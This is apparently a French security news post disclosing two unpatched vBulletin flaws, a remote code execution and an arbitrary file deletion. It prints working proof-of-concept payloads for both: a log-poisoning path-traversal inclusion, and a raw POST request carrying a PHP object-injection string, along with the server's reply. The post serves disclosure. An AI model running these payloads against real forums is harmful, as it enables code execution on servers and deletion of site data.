Des chercheurs en sécurité ont découvert et divulgué des détails de deux vulnérabilités critiques non corrigées dans vBulletin un forum Internet très populaire qui pourrait permettre à un attaquant distant d’exécuter un code malveillant sur la dernière version de vBulletin.
La faille d’execution de code à distance
Proof-of-Concept (PoC)
/index.php?routestring=.\\
Si la reponse est
Le serveur est vulnérable.
Si nous voulons injecter un code php à tout fichier sur le serveur, nous pouvons utiliser le access.log par exemple:
/?LogINJ_START=<?php phpinfo();?>LogINJ_END
Après cela, nous pouvons inclure access.log avec notre code PHP:
/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log
La faille de suppression de fichier arbitraire à distance
Proof-of-Concept (PoC)
En envoyant la requête POST suite d’ un attaquant non authentifié peut supprimer des fichiers du serveur victimes
POST /vb533/ajax/api/template/cacheTemplates HTTP/1.1 Host: vb533.test Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 125 templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:1
le serveur répondra avec:
HTTP/1.1 200 OK Date: Fri, 27 Oct 2017 09:27:52 GMT Server: Apache/2.4.18 (Ubuntu) Set-Cookie: sessionhash=409d8f4b16ebb55471e63509834d0eff; path=/; HttpOnly Set-Cookie: lastvisit=1509096472; path=/; HttpOnly Set-Cookie: lastactivity=1509096472; path=/; HttpOnly Set-Cookie: sessionhash=44b1e8d2d433031ec2501649630dd8bf; path=/; HttpOnly Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0 Expires: Sat, 1 Jan 2000 01:00:00 GMT Last-Modified: Fri, 27 Oct 2017 09:27:52 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 2101 Connection: close Content-Type: application/json; charset=UTF-8 {"errors":[["unexpected_error","Cannot use object of type vB_Image_ImageMagick as array"]]}
commentaires
Chargement & hellip;